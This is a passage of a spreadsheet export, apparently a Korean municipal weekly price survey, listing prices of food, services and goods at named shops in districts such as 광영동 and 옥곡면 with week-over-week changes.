[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,"커뮤니티센터",0,0,0,null,0,0,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",2,2,4000,4000,0,"가야볼링장",4000,4000,0,null,4000,4000,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,225000,225000,0,"제이골프아카데미",250000,250000,0,"체인지골프아카데미",200000,200000,0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,20000,20000,0,"솔로몬노래연습장",20000,20000,0,"좋아좋아노래연습장",20000,20000,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,10000,10000,0,"진당구클럽",10000,10000,0,"발섬당구장",10000,10000,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,19000,19000,0,"명진포토샵",18000,18000,0,"코코포토",20000,20000,0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,400,400,0,"명진포토샵",300,300,0,"코코포토",500,500,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,null,0,0,0,null,0,0,0]
[40,"이용료(컷트)","성인조발 중류급 1회",2,2,12500,12500,0,"커트맨",10000,10000,0,"중앙이용원",15000,15000,0]
[41,"미용료","성인여자 파마(일반)",2,2,32500,32500,0,"한가을헤어샵",35000,35000,0,"아이리스헤어",30000,30000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",1,1,8000,8000,0,"백운사우나",8000,8000,0,null,0,0,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",0,0,0,0,0,null,0,0,0,null,0,0,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,40000,40000,0,"리베라모텔",40000,40000,0,"유토피아모텔",40000,40000,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,0,0,0,null,0,0,0,null,0,0,0]
[46,"PC방\n이용료","1회 이용시",2,2,1000,1000,0,"PC토랑",1000,1000,0,"3POP피시방",1000,1000,0]
[47,"택배이용료","20kg이하, 타지역",2,2,6750,6750,0,"경동택배",6500,6500,0,"한진택배",7000,7000,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,0,0,0,null,0,0,0,null,0,0,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":6335},6335,{"$f":"G86-F86","v":0},"와이마트",{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},{"$f":"K86-J86","v":0},"롯데슈퍼",6420,6420,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,1425,1425,0,"와이마트",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"롯데슈퍼",1450,1450,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,1175,1175,0,"와이마트",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,"롯데슈퍼",1150,1150,0]
[4,"식용유","콩기름 1.8ml",2,2,8950,7575,-1375,"와이마트",{"v":8550,"d":"8,550"},{"v":5800,"d":"5,800"},-2750,"롯데슈퍼",9350,9350,0]
[5,"설탕","정백당 1kg",2,2,3120,3120,0,"와이마트",{"v":3450,"d":"3,450"},{"v":3450,"d":"3,450"},0,"롯데슈퍼",2790,2790,0]
[6,"생수","플라스틱 1병(500㎖)",2,2,575,575,0,"와이마트",550,550,0,"롯데슈퍼",600,600,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,1820,1860,40,"와이마트",{"v":1890,"d":"1,890"},{"v":1890,"d":"1,890"},0,"롯데슈퍼",1830,1830,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"$f":"IF(D93=0,0,SUM(J93,N93)/D93)","v":1540},{"$f":"IF(E93=0,0,SUM(K93,O93)/E93)","v":1540},0,"와이마트",{"v":1490,"d":"1,490"},{"v":1490,"d":"1,490"},0,"롯데슈퍼",1590,1590,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"SK고향주유소",0,0,0,"GS태양점",0,0,0]
[10,"경유","주유소 판매 1ℓ",2,2,{"$f":"IF(D95=0,0,SUM(J95,N95)/D95)","v":1488},1488,0,"SK고향주유소",1498,1498,0,"GS태양점",{"v":1478,"d":"1,478"},{"v":1478,"d":"1,478"},0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":1557.5},1578,20.5,"SK고향주유소",1558,1578,20,"GS태양점",{"v":1557,"d":"1,557"},{"v":1578,"d":"1,578"},21]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"$f":"IF(D97=0,0,SUM(J97,N97)/D97)","v":150000},150000,0,"피앤플음악학원",150000,150000,0,"음사랑음악학원",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",2,2,{"$f":"IF(D98=0,0,SUM(J98,N98)/D98)","v":150000},150000,0,"하늘담은미술",140000,140000,0,"예초미술학원",{"v":160000,"d":"160,000"},{"v":160000,"d":"160,000"},0]

{"sheet":"광영동","index":5,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광영동) 조사자:진옥윤"]
[{"$nulls":12},"조사자 : 진옥윤"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역 (광영농협)",{"$nulls":3},"조 사 2 지 역 (광영시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(26개 품목)"]
[1,"쌀","일반미 20kg",2,{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":48800},47650,{"$f":"G7-F7","v":-1150},"광영농협",45800,45800,{"$f":"K7-J7","v":0},"지마트",51800,49500,{"$f":"O7-N7","v":{"v":-2300,"d":"-2,300"}}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,1000,1000,0,"광영농협",1000,1000,0,"광영시장",1000,1000,0]
[3,"상추","잎상추 500g",2,2,5000,5000,0,"광영농협",6000,6000,0,"광영시장",4000,4000,0]
[4,"양상추","상품1개(350~400g)",2,2,2490,2490,0,"광영농협",2980,2980,0,"광영시장",2000,2000,0]
[5,"애호박","상품1개(300~350g)",2,2,2740,2740,0,"광영농협",2980,2980,0,"광영시장",2500,2500,0]
[6,"열무","상품 4kg(1단)",2,{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(O12,\"<>0\")","v":0},0,0,0,"광영농협",0,0,null,"광영시장",0,0]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},2,1915,2330,415,"광영농협",1830,2660,830,"광영시장",2000,2000,0]
[8,"오이","상품 3개",2,{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},5220,5220,0,"광영농협",5940,5940,0,"광영시장",4500,4500,0]
[9,"풋고추","신선한것 1kg",2,2,10000,13250,3250,"광영농협",9000,13500,{"v":4500,"d":"4,500"},"광영시장",11000,13000,{"v":2000,"d":"2,000"}]
[10,"마늘","깐것 상품 1kg",2,2,9300,9300,0,"광영농협",9600,9600,0,"광영시장",9000,9000,0]
[11,"감자","흰색 1kg",2,2,3900,4150,250,"광영농협",4800,4800,0,"광영시장",3000,3500,500]
[12,"배추","1포기 3kg",2,2,3500,2980,-520,"광영농협",4000,2960,{"v":-1040,"d":"-1,040"},"광영시장",3000,3000,0]
[13,"콩나물","1봉지 500g ",2,2,1490,1490,0,"광영농협",1980,1980,0,"광영시장",1000,1000,0]
[14,"사과","상품 1개(300∼350g)",2,2,4580,3455,-1125,"광영농협",4160,2910,{"v":-1250,"d":"-1,250"},"광영시장",5000,4000,{"v":-1000,"d":"-1,000"}]
[15,"배","(600-700)",2,2,5130,3980,-1150,"광영농협",5260,3960,{"v":-1300,"d":"-1,300"},"광영시장",5000,4000,{"v":-1000,"d":"-1,000"}]
[16,"바나나","상품 1kg",2,2,3690,3900,210,"광영농협",3380,3800,420,"광영시장",4000,4000,0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,53400,53400,0,"광영농협",49800,49800,0,"광영시장",57000,57000,0]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",1,1,12000,12000,0,"광영농협",null,null,0,"광영시장",12000,12000,0]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},2,12840,11940,-900,"광영농협",11880,10080,{"v":-1800,"d":"-1,800"},"광영시장",13800,13800,0]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,8250,8250,0,"광영농협",8500,8500,0,"광영시장",8000,8000,0]
[21,"달걀","특란 30개 한판",2,2,8200,8200,0,"광영농협",8400,8400,0,"광영시장",8000,8000,0]
[22,"조기","15cm 1마리",2,2,2900,2900,0,"광영농협",2300,2300,0,"광영시장",3500,3500,0]
[23,"갈치","60cm 1마리",{"$f":"COUNTIF(J29,\"<>0\")+COUNTIF(N29,\"<>0\")","v":2},2,4725,4725,0,"광영농협",4450,4450,0,"광영시장",5000,5000,0]
[24,"명태","40cm 1마리",2,2,3500,3500,0,"광영농협",3500,3500,0,"광영시장",3500,3500,0]
[25,"고등어","30cm 1마리",2,2,3200,2900,-300,"광영농협",2900,2300,-600,"광영시장",3500,3500,0]
[26,"냉동오징어","30cm 1마리",2,2,6000,6000,0,"광영농협",6000,6000,0,"광영시장",6000,6000,0]
[27,"콩","1kg",2,2,8320,8320,0,"광영농협",9640,9640,0,"광영시장",7000,7000,0]
[28,"고춧가루","3kg",2,2,96400,96400,0,"광영농협",112800,112800,0,"광영시장",80000,80000,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",1,1,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":10000},10000,{"$f":"G36-F36","v":0},"이신자설렁탕",10000,10000,{"$f":"K36-J36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},2,6500,6500,0,"김가네",7000,7000,0,"김밥천국",6000,6000,{"$f":"O37-N37","v":0}]
[3,"비빔밥","1인분(보통)",2,2,5750,5750,0,"김가네",6000,6000,0,"김밥천국",5500,5500,0]
[4,"갈비탕","1인분(보통)",2,2,13500,13500,0,"이신자설렁탕",15000,15000,0,"조선옥",12000,12000,0]
[5,"삼계탕","1인분(보통)",2,2,14500,14500,0,"원진삼계탕",14000,14000,0,"능이야산에가자",15000,15000,0]
[6,"된장찌개\n백반","1인분(보통)",2,2,8500,8500,0,"팔구식당",9000,9000,0,"호롱식당\n(금호식당)",8000,8000,0]
[7,"김치찌개\n백반","1인분(보통)",2,2,8500,8500,0,"팔구식당",9000,9000,0,"호롱식당\n(금호식당)",8000,8000,0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,16500,16500,0,"조선옥",21000,21000,0,"맛내골",12000,12000,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,46920,46920,0,"조선옥",53840,53840,0,"고기마을",40000,40000,0]
[10,"생선초밥","1인분(보통), 활어기준",1,1,12900,12900,0,"가산팔보초밥",12900,12900,0,"없음",0,0,0]
[11,"튀김닭","양념통닭 1마리",2,2,18000,18000,0,"아주커통닭",18000,18000,0,"네네두마리치킨",18000,18000,0]
[12,"칼국수","1인분(보통)",2,2,7000,7000,0,"바지락칼국수",7000,7000,0,"짱칼국수",7000,7000,0]
[13,"조리라면","분식점 1인분",2,2,4000,4000,0,"김가네",4000,4000,0,"꼬마김밥여행",4000,4000,0]
[14,"김밥","분식점 1인분",2,2,3750,3750,0,"김가네",3500,3500,0,"꼬마김밥여행",4000,4000,0]
[15,"짜장면","1인분(보통)",2,2,6000,6000,0,"자금성",6000,6000,0,"장수관",6000,6000,0]
[16,"짬뽕","1인분(보통)",2,2,8000,8000,0,"자금성",7000,7000,0,"장수관",9000,9000,0]
[17,"탕수육","일반탕수육(보통)",2,2,17500,17500,0,"자금성",17000,17000,0,"장수관",18000,18000,0]
[18,"돈가스","일반돈가스,1인분",2,2,7250,7250,0,"김가네",8500,8500,0,"김밥천국",6000,6000,0]
[19,"햄버거","기본형(야채,고기)",2,2,3500,3500,0,"하나베이커리",3000,3000,0,"브레드빈",4000,4000,0]
[20,"피자","기본형(야채,고기)",{"$f":"COUNTIF(J55,\"<>0\")+COUNTIF(N55,\"<>0\")","v":2},2,11950,11950,0,"히트피자",13000,13000,0,"피자스쿨",10900,10900,0]
[21,"커피(외식)","일반원두커피",2,2,3250,3250,0,"데일리에\n스프레소",3500,3500,0,"청자다방",3000,3000,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,3250,3250,0,"데일리에\n스프레소",4000,4000,0,"청자다방",2500,2500,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,13500,13500,0,"조선옥",14000,14000,0,"화성갈비",13000,13000,0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,13500,13500,0,"조선옥",14000,14000,0,"화성갈비",13000,13000,0]
[25,"쇠갈비","식육식당 200g(국내산)",1,1,32000,32000,0,"조선옥",32000,32000,0,"고기마을",0,0,0]
[26,"생맥주","500CC 1잔",2,2,3900,3900,0,"네네두마리치킨",4000,4000,0,"김복남맥주1995",3800,3800,0]
[27,"공동\n주택관리비","목우 18평1개월\n(공과금 제외)",2,2,54500,54500,0,"목우아파트",60000,60000,0,"현대저층아파트",49000,49000,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,12000,12000,0,"대도세탁소",12000,12000,0,"뉴스타세탁소",12000,12000,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,6000,6000,0,"대도세탁소",6000,6000,0,"뉴스타세탁소",6000,6000,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,150000,150000,0,"조프로골프장",150000,150000,{"$f":"K69-J69","v":0},"광영골프장",150000,150000,{"$f":"O69-N69","v":0}]
[35,"노래방\n이용료","일반인 저녁 1시간",{"$f":"COUNTIF(J70,\"<>0\")+COUNTIF(N70,\"<>0\")","v":2},2,25000,25000,0,"J J노래방",25000,25000,0,"열정노래방",25000,25000,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,10000,10000,0,"에스당구장",10000,10000,0,"신당구장",10000,10000,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,16500,16500,0,"대성사진관",15000,15000,0,"디지털포토",18000,18000,0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,2500,2500,0,"대성사진관",5000,5000,0,"디디지털포토",0,0,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,"없음",{"$nulls":3},"없음",null,null,0]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},2,18000,18000,0,"명동이발관",18000,18000,{"$f":"K75-J75","v":0},"경민이발관",18000,18000,0]
[41,"미용료","성인여자 파마(일반)",2,2,40000,40000,0,"이쁘게멎지게",40000,40000,0,"예쁘다",40000,40000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",2,2,8250,8250,0,"스파렉스",9500,9500,0,"궁전사우나",7000,7000,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",{"$f":"COUNTIF(J79,\"<>0\")+COUNTIF(N79,\"<>0\")","v":2},2,40000,40000,0,"모리스모텔",40000,40000,{"$f":"K79-J79","v":0},"코리아모텔",40000,40000,{"$f":"O79-N79","v":0}]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,{"$nulls":3},"없음",{"$nulls":3},"없음"]
[46,"PC방\n이용료","1회 이용시",{"$f":"COUNTIF(J81,\"<>0\")+COUNTIF(N81,\"<>0\")","v":2},2,{"$f":"IF(D81=0,0,SUM(J81,N81)/D81)","v":1100},1100,{"$f":"G81-F81","v":0},"초콜렛pc존",1200,1200,{"$f":"K81-J81","v":0},"몬스터pc",1000,1000,{"$f":"O81-N81","v":0}]
[47,"택배이용료","20kg이하, 타지역",1,1,16000,16000,0,"CJ택배",8000,8000,0,"우체국택배\n(추가)",8000,8000,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",1,1,13500,13500,0,"스파렉스",13500,13500,0,"없음",null,null,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,{"$nulls":3},"없음",{"$nulls":3},"없음",null,null,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":5625},5625,{"$f":"G86-F86","v":0},"광영농협",5350,5350,{"$f":"K86-J86","v":0},"G마트",5900,5900,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,970,970,0,"광영농협",950,950,0,"G마트",990,990,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,1140,1140,0,"광영농협",1080,1080,0,"G마트",1200,1200,0]
[4,"식용유","콩기름 1.8ml",2,2,6980,6480,-500,"광영농협",6980,6980,0,"G마트",6980,5980,{"v":-1000,"d":"-1,000"}]
[5,"설탕","정백당 1kg",2,2,2680,2680,0,"광영농협",2380,2380,0,"G마트",2980,2980,0]
[6,"생수","플라스틱 1병(500㎖)",2,2,515,515,0,"광영농협",480,480,0,"G마트",550,550,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,1760,1760,0,"광영농협",1670,1670,0,"G마트",1850,1850,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,1470,1470,0,"광영농협",1390,1390,0,"G마트",1550,1550,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"제철주유소",0,0,0,null,0,0,0]
[10,"경유","주유소 판매 1ℓ",{"$f":"COUNTIF(J95,\"<>0\")+COUNTIF(N95,\"<>0\")","v":2},2,1443.5,1456.5,13,"제철주유소",1458,1468,10,"광영우리주유소\n(알뜰) ",1429,1445,16]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,1547,1566.5,19.5,"제철주유소",1558,1588,30,"광영우리주유소\n(알뜰) ",1536,1545,9]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,140000,140000,0,"그라미피아노",140000,140000,0,"유신영피아노",140000,140000,0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",1,1,120000,120000,0,"선영미술학원",120000,120000,0,{"$nulls":3},0]

{"sheet":"옥곡면","index":6,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
[" 주간 물간동향 (옥곡면)"]
[{"$nulls":12},"조사자 : 김보미"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(옥곡5일시장)",{"$nulls":3},"조 사 2 지 역(옥곡하나로마트)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg(웰빙간척)",2,{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":57500},57500,{"$f":"G7-F7","v":0},"옥곡5일시장",58000,58000,{"$f":"K7-J7","v":0},"옥곡하나로마트",57000,57000,{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,1350,1150,-200,"옥곡5일시장",1000,1000,0,"옥곡하나로마트",1700,1300,-400]
[3,"상추","잎상추 500g",2,2,5000,5500,500,"옥곡5일시장",3000,4000,1000,"옥곡하나로마트",7000,7000,0]
[4,"양상추","상품1개(350~400g)",2,2,1500,1250,-250,"옥곡5일시장",1500,1500,0,"옥곡하나로마트",1500,1000,-500]
[5,"애호박","상품1개(300~350g)",2,2,2325,2450,125,"옥곡5일시장",2500,2500,0,"옥곡하나로마트",2150,2400,250]
[6,"열무","상품 4kg(1단)",0,0,0,0,0,"옥곡5일시장",0,0,0,"옥곡하나로마트",0,0,0]
[7,"양파","1망 1kg",2,2,2140,2140,0,"옥곡5일시장",2250,2250,0,"옥곡하나로마트",2030,2030,0]
[8,"오이","상품 3개",2,2,4200,4200,0,"옥곡5일시장",3000,3000,0,"옥곡하나로마트",5400,5400,0]
[9,"풋고추","신선한것 1kg",2,2,10750,11500,750,"옥곡5일시장",8000,8000,0,"옥곡하나로마트",13500,15000,1500]
[10,"마늘","깐것 상품 1kg",2,2,10600,8500,-2100,"옥곡5일시장",8000,8000,0,"옥곡하나로마트",13200,9000,-4200]
[11,"감자","흰색 1kg",2,2,3750,4000,250,"옥곡5일시장",2500,3000,500,"옥곡하나로마트",5000,5000,0]
[12,"배추","1포기 3kg",2,2,2200,2000,-200,"옥곡5일시장",2000,2000,0,"옥곡하나로마트",2400,2000,-400]
[13,"콩나물","1봉지 500g ",2,2,1490,1490,0,"옥곡5일시장",1000,1000,0,"옥곡하나로마트",1980,1980,0]
[14,"사과","상품 1개(300∼350g)",2,2,4000,3050,-950,"옥곡5일시장",3500,3500,0,"옥곡하나로마트",4500,2600,-1900]
[15,"배","(600-700)",1,2,4500,4066.5,-433.5,"옥곡5일시장",4500,4500,0,"옥곡하나로마트",0,3633,3633]
[16,"바나나","상품 1kg",2,2,3090,3125,35,"옥곡5일시장",3500,3500,0,"옥곡하나로마트",2680,2750,70]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,25500,26700,1200,"없음",null,null,0,"옥곡하나로마트",51000,53400,2400]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",1,1,0,0,0,"없음",null,null,0,"없음",0,0,0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,5040,5070,30,"없음",null,null,0,"옥곡하나로마트",10080,10140,60]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,6900,6900,0,"옥곡5일시장",7000,7000,0,"옥곡하나로마트",6800,6800,0]
[21,"달걀","특란 30개 한판",2,2,8375,8450,75,"옥곡5일시장",8500,8500,0,"옥곡하나로마트",8250,8400,150]
[22,"조기","15cm 1마리",2,2,1500,1750,250,"옥곡5일시장",3000,3500,500,"옥곡하나로마트",null,null,0]
[23,"갈치","60cm 1마리",2,2,2750,3250,500,"옥곡5일시장",2500,3500,1000,"옥곡하나로마트",3000,3000,0]
[24,"명태","40cm 1마리",2,2,3666.5,3816.5,150,"옥곡5일시장",3333,3333,0,"옥곡하나로마트",4000,4300,300]
[25,"고등어","30cm 1마리",2,2,2500,2750,250,"옥곡5일시장",2500,3000,500,"옥곡하나로마트",2500,2500,0]
[26,"냉동오징어","30cm 1마리",2,2,4725,4725,0,"옥곡5일시장",5000,5000,0,"옥곡하나로마트",4450,4450,0]
[27,"콩","1kg",2,2,7250,7250,0,"옥곡5일시장",6500,6500,0,"옥곡하나로마트",8000,8000,0]
[28,"고춧가루","3kg",2,2,107600,107600,0,"옥곡5일시장",100000,100000,0,"옥곡하나로마트",115200,115200,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},2,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":0},0,{"$f":"G36-F36","v":0},"없음",null,null,{"$f":"K36-J36","v":0},"없음",null,null,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[3,"비빔밥","1인분(보통)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[4,"갈비탕","1인분(보통)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[5,"삼계탕","1인분(보통)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[6,"된장찌개\n백반","1인분(보통)",2,2,4500,4500,0,"환희식당",9000,9000,0,"없음",null,null,0]
[7,"김치찌개\n백반","1인분(보통)",2,2,4500,4500,0,"환희식당",9000,9000,0,"없음",null,null,0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[11,"튀김닭","양념통닭 1마리",2,2,17500,17500,0,"노랑통닭",20000,20000,0,"임금님통닭",15000,15000,0]
[12,"칼국수","1인분(보통)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[13,"조리라면","분식점 1인분",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[14,"김밥","분식점 1인분",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[15,"짜장면","1인분(보통)",2,2,7000,7000,0,"동화루",7000,7000,0,"이순원",7000,7000,0]
[16,"짬뽕","1인분(보통)",2,2,9500,9500,0,"동화루",10000,10000,0,"이순원",9000,9000,0]
[17,"탕수육","일반탕수육(보통)",2,2,21500,21500,0,"동화루",23000,23000,0,"이순원",20000,20000,0]
[18,"돈가스","일반돈가스,1인분",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[19,"햄버거","기본형(야채,고기)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[20,"피자","기본형(야채,고기)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[21,"커피(외식)","일반원두커피",2,2,3000,3000,0,"꼬솜제과",2500,2500,0,"옥실애",3500,3500,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,3650,3650,0,"꼬솜제과",2500,2500,0,"옥실애",4800,4800,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,16000,16000,0,"환희식당",{"$f":"80*200","v":16000},{"$f":"80*200","v":16000},0,"돈되지삼겹",{"$f":"80*200","v":16000},{"$f":"80*200","v":16000},0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[25,"쇠갈비","식육식당 200g(국내산)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[26,"생맥주","500CC 1잔",2,2,1750,1750,0,"까투리",3500,3500,0,"없음",null,null,0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,41177,41177,0,"광양펠리시아",82354,82354,0,"없음",null,null,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,6000,6000,0,"한일세탁소",12000,12000,0,"없음",null,null,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,12500,12500,0,"명가원노래연습장",25000,25000,0,"없음",null,null,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
